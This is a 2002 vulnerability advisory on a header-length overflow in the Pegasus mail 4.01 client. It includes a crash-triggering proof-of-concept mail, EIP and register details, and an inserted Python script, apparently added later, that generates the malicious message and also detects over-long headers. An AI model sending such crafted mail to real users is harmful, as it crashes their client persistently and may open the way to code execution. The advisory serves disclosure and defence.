######################################################################

                             Luigi Auriemma

Application:  Pegasus mail (http://www.pmail.com)
Version:      4.01 and possibly previous
Bug:          Bad management of "From:" and "To:" mail headers
Date:         24 Jul 2002
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

######################################################################

Sections:

1) Introduction
2) Bug
3) The Code
4) Fix

######################################################################

===============
1) Introduction
===============

Pegasus mail is a widely used free mail client for Windows (32 and 16
bit) and DOS. The version tested is the latest at the time of writing,
4.01 for Win32. The tests were done on Win98SE, so some details (for
example the crash addresses and register contents given below) may
differ a bit on NT/2K/XP or other systems.

I have contacted all the support mail addresses listed in the program
but have received no answer, so no official fix is available. This is
not a big problem, because an advisory is also useful to draw the
attention of the vulnerable program's author.

######################################################################

======
2) Bug
======

The bug is in the handling of the "From:" and "To:" headers of
received mail. Pegasus mail can handle at most 259 chars in each of
these two fields, so the problem appears when an attacker sends a
header that is longer than that.

For example, the following is a proof-of-concept mail:

/*mail*/
From: myname <250'A's>
To: test@localhost
Subject: Good crash

You cannot see this text 8-)
/*end_mail*/

(The 260 chars are counted after "From:": " myname <" is 9 chars, the
250 'A's bring the total to 259, and the closing ">" makes 260. The
"To:" header behaves identically.)

The program crashes in different ways, and which way seems to depend
on the program options that are enabled.
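The proof-of-concept above can be generated and checked for with a few lines of code. The following is an added example, not the PoC from pegasus.zip or any code from the Pegasus mail author: it builds a message with the exact layout the advisory counts (" myname <" + 250 'A's + ">" = 260 chars after "From:") and, for the receiving side, unfolds and measures the "From:" and "To:" values of any message so that an over-long one can be rejected or quarantined before it reaches the client. The function names, the CRLF line endings and the placeholder addresses are assumptions for illustration; the advisory does not say how Pegasus mail treats folded (multi-line) headers, so the unfolding done here is what a filter would do, not a claim about the client.

```python
"""Generate and detect over-long "From:"/"To:" headers of the kind the
advisory describes.

Added example, not the advisory's own PoC. The 259-char limit and the
" myname <" + 250*'A' + ">" layout come from the advisory; function
names, line endings and the placeholder addresses are made up here.
"""

# Longest "From:"/"To:" value Pegasus mail 4.01 handles, per the advisory.
MAX_HEADER_CHARS = 259


def build_poc_message(target="From", display_name="myname", padding=250,
                      pad_char="A", other_address="test@localhost"):
    """Return the raw text of a PoC mail with an over-long From: or To:.

    The over-long value is " <display_name> <" + padding*pad_char + ">",
    which with the defaults is 260 chars, one more than the limit, counted
    from right after the colon exactly as the advisory counts it.
    other_address is a constructed placeholder for the untouched header.
    """
    long_value = f" {display_name} <{pad_char * padding}>"
    if target == "From":
        headers = ["From:" + long_value, "To: " + other_address]
    elif target == "To":
        headers = ["From: " + other_address, "To:" + long_value]
    else:
        raise ValueError("target must be 'From' or 'To'")
    headers.append("Subject: Good crash")
    body = "You cannot see this text 8-)"
    return "\r\n".join(headers) + "\r\n\r\n" + body + "\r\n"


def header_values(raw_message):
    """Split the header block into (name, value) pairs.

    The value keeps everything after the colon, including the leading
    space, because that is how the advisory counts the 260 chars.
    Folded continuation lines (starting with whitespace) are joined onto
    the previous header with only the line break removed, so a header
    spread over several lines is measured at its unfolded length.
    Python's email parser is deliberately not used: it strips the leading
    space, which would make the count come out one short.
    """
    text = raw_message.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n"):
        if line[:1] in (" ", "\t") and pairs:
            name, value = pairs[-1]
            pairs[-1] = (name, value + line)
        elif ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value))
    return pairs


def overlong_headers(raw_message, names=("From", "To"),
                     limit=MAX_HEADER_CHARS):
    """Return {header_name: length} for every From:/To: value over limit.

    An empty dict means the message is within the limit the advisory gives
    and would not trigger this particular crash.
    """
    wanted = {n.lower() for n in names}
    found = {}
    for name, value in header_values(raw_message):
        if name.lower() in wanted and len(value) > limit:
            found[name] = len(value)
    return found


if __name__ == "__main__":
    poc = build_poc_message()
    print(poc)
    print("over-long headers:", overlong_headers(poc))
```

Run stand-alone, the script prints the generated mail and reports `{'From': 260}`; feeding it a message with 249 'A's instead reports nothing, which is the boundary the advisory describes.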
It can crash when the mail is opened, or already when mail is checked.
The real problem comes when the client is reopened: the mail is cached
in the user's mail folder, so the problem continues until the user
deletes the bad mail. Another problem is that the malformed mail seems
to be undeletable from within the program, because Pegasus crashes
again when it is deleted from the trash. The workaround is to move the
mail to the trash and then restart the program, which deletes the mail
automatically without crashing.

Two errors occur, one after the other. The first depends on which
field is used:

"From:"   The first error happens when EIP reaches 0x004157c0, with
          the EDX register filled from the overflowed header.

"To:"     The first error happens when EIP reaches 0x004c668c, with
          the EAX and EDI registers filled from the overflowed header.

The second error happens in Kernel32.dll at EIP 0xbffc04d4.

######################################################################

===========
3) The Code
===========

Download the proof-of-concept from:

http://aluigi.org/poc/pegasus.zip

######################################################################

======
4) Fix
======

See the Pegasus mail site (http://www.pmail.com) for updates.

######################################################################